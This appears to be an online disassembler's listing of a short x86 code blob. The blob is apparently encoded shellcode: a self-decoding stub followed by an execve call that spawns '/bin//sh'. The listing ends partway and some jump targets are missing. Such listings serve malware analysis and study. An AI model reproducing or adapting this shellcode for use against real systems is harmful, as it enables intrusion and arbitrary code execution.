Disassemble windows PE file
Disassemble hexadecimal string
Link to this pageEntry point : 0x00000000
| [0x00000000] | jmp near | |
| [0x00000002] | pop edx |
|
| [0x00000003] | mov esi, edx | |
| [0x00000005] | mov eax, [edx] |
|
| [0x00000007] | cmp ax, 0x7dca | |
| [0x0000000b] | jnz | |
| [0x0000000d] | add ax, 0x303 | |
| [0x00000011] | mov [edx], eax | |
| [0x00000013] | inc dl |
|
| [0x00000015] | cmp eax, 0x41414141 | |
| [0x0000001a] | jnz | |
| [0x0000001c] | jmp esi | |
| [0x0000001e] | call |
|
| [0x00000023] | xor edx, edx | |
| [0x00000025] | push 0xb | |
| [0x00000027] | pop eax | |
| [0x00000028] | cdq | |
| [0x00000029] | push edx | |
| [0x0000002a] | push dword 0x68732f2f | |
| [0x0000002f] | push dword 0x6e69622f | |
| [0x00000034] | mov ebx, esp | |
| [0x00000036] | push edx | |
| [0x00000037] | push ebx | |
| [0x00000038] | mov ecx, esp | |
| [0x0000003a] | retf 0x417d |